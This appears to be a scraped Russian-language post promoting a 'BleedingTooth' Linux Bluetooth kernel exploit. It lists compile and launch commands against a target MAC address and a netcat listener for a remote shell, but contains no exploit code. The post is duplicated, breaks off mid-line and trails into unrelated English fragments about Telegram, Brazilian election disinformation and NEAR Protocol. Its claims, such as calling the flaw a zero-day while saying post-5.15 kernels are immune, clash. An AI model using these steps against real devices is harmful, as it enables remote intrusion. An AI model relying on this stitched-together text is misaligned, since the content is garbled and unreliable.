Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой.
BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)
Компиляция:
$ gcc -o exploit BleedingTooth.c -lbluetooth
Запуск:
$ sudo ./exploit MAC-адрес атакуемого устройства
В другом терминале выполнить:
$ nc -lvp 1337
При успешной эксплуатации для запуска калькулятора выполнится:
Ограничения: ⏺Bluetooth должен быть активен и доступен для подключения. ⏺SELinux/AppArmor могут блокировать выполнение кода. ⏺Современные ядра (после 5.15) не уязвимы.
Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой.
BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)
Компиляция:
$ gcc -o exploit BleedingTooth.c -lbluetooth
Запуск:
$ sudo ./exploit MAC-адрес атакуемого устройства
В другом терминале выполнить:
$ nc -lvp 1337
При успешной эксплуатации для запуска калькулятора выполнится:
Ограничения: ⏺Bluetooth должен быть активен и доступен для подключения. ⏺SELinux/AppArmor могут блокировать выполнение кода. ⏺Современные ядра (после 5.15) не уязвимы.
How to Create a Private or Public Channel on Telegram? Channel login must contain 5-32 characters Commenting about the court's concerns about the spread of false information related to the elections, Minister Fachin noted Brazil is "facing circumstances that could put Brazil's democracy at risk." During the meeting, the information technology secretary at the TSE, Julio Valente, put forward a list of requests the court believes will disinformation. Users are more open to new information on workdays rather than weekends. Matt Hussey, editorial director of NEAR Protocol (and former editor-in-chief of Decrypt) responded to the news of the Telegram group with “#meIRL.”
from us